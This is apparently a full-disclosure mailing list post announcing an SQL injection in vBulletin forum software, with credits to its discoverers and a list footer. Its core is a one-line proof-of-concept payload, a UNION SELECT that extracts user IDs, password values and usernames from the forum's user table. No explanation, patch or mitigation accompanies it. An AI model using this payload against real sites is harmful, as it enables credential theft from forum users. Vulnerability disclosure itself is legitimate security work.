/****************************************/
CREDIT:
discovered by meto5757 and disfigure
PRODUCT:
vBulletin
http://www.vbulletin.com/
VULNERABILITY:
SQL Injection
NOTES:
POC:
') union select 1,1,1,1,1,userid,password,1,username from user – 9
greets: w4ck1ng.com
/****************************************/
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/